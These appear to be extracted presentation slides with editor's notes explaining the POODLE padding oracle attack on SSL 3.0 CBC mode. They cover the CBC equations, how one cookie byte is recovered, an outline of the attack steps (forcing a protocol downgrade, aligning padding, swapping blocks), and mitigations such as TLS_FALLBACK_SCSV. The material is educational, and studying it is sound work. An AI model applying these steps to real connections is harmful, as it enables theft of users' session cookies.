  • 4. POST /path Cookie: name=value...rnrnbody ‖ 20byte MAC ‖ padding C1 C2 Ci Cn-1 Cn P1 P2 Pi Pn-1 Pn Pi Pn P1 CiC1 Cn Ci = EK(Pi Ꚛ Ci-1) C0 = IV Cipher Block Chaining Encryption EnCt29642a9666ee9dbc8c0306acacb63bf8dcf2c554d9642a9666ee9dbc8c0306acae2n1AGm0vgFHgpMKrFgwdWAEF AES block size is 16 bytes DES block size is 8 bytes
  • 5. Cipher Block Chaining Decryption Pi = DK(Ci) Ꚛ Ci-1 C0 = IV C1 CnCi P1 Pi Pn C1 C2 Ci Cn-1 Cn P1 P2 Pi Pn-1 Pn POST /path Cookie: name=value...rnrnbody ‖ 20byte MAC ‖ padding EnCt29642a9666ee9dbc8c0306acacb63bf8dcf2c554d9642a9666ee9dbc8c0306acae2n1AGm0vgFHgpMKrFgwdWAEF Back
  • 6. POST /path Cookie: sessionid=value...rnrnbody ‖ 20byte MAC ‖ padding Padding of 1 to L bytes (where L is the block size in bytes) is added before performing blockwise CBC The attacker controls the request path & request body & hence can forge requests such that: 1. The padding fills an entire block (encrypted into Cn). 2. The cookie’s first (as of yet unknown) byte appears as the final byte in an earlier block (which gets encrypted into Ci). • The attacker replaces Cn by any earlier ciphertext block Ci • the ciphertext will be accepted if DK(Ci) ⊕ Cn-1 happens to have 15 as its final byte, • otherwise, it will be rejected  giving rise to a padding oracle attack The attack Ci Cn
  • 7. Attack Contd. Assuming L=16 (AES) and ciphertext gets accepted: From (a): 15 = DK(Ci) [15] ⊕ Cn-1[15] , which can be written as => DK(Ci) [15] = 15 ⊕ Cn-1[15] --------- (1) We know: Pi = DK(Ci) ⊕ Ci-1 and hence Pi[15] = DK(Ci) [15] ⊕ Ci-1[15] --------- (2) By replacing DK(Ci) [15] from (1) in (2) we get Pi[15] = 15 ⊕ Cn-1[15] ⊕ Ci-1[15] Unknown entity Known entity C1 Cn /CiCn-1 P1 Pn-1 Pn From CBC decryption (here) we know: Pi = DK(Ci) Ꚛ Ci-1  Pn = DK(Cn) Ꚛ Cn-1  Pn[15] = DK(Cn)[15] Ꚛ Cn-1[15] ----- (a) C1 C2 Ci Cn-1 Cn/Ci DK(Cn /Ci)
  • 8. Overall Effort • 256 SSL 3.0 requests per byte Recommendation • disabling the SSL 3.0 protocol in the client or in the server or both • TLS_FALLBACK_SCSV • when an incoming connection includes 0x56, 0x00 (TLS_FALLBACK_SCSV) in ClientHello.cipher_suites, compare ClientHello.client_version to the highest protocol version supported by the server. If the server supports a version higher than the one indicated by the client, reject the connection Problem with SSL 3.0 in CBC mode: The integrity of padding cannot be verified when decrypting as it is not covered by the MAC
  • 10. Attack Steps: • Degrade TLS protocol usage to SSLv3 by disruption of TLS handshake attempts. • Justify the URL and POST length such that the last block of the ciphertext is padding. • Perform the copy operation on every generated TLS packet and calculate the leaked byte if the server accepts the modified packet.
  • 11. References • This POODLE Bites: Exploiting The SSL 3.0 Fallback Bodo Möller, Thai Duong, Krzysztof Kotowicz https://www.openssl.org/~bodo/ssl-poodle.pdf • Attack of the week: POODLE, https://blog.cryptographyengineering.com/2014/10/15/attack-of- week-poodle/ • Implementing the POODLE Attack, https://patzke.org/implementing-the-poodle-attack.html

Editor's Notes

  1. An initialization vector (IV) or starting variable (SV)[5] is a block of bits that is used by several modes to randomize the encryption and hence to produce distinct ciphertexts even if the same plaintext is encrypted multiple times, without the need for a slower re-keying process.
  2. Now observe that if there’s a full block of padding and an attacker replaces Cn by any earlier ciphertext block Ci from the same encrypted stream, the ciphertext will still be accepted if DK(Ci) ⊕ Cn-1 happens to have L-1 as its final byte, but will in all likelihood be rejected otherwise, giving rise to a padding oracle attack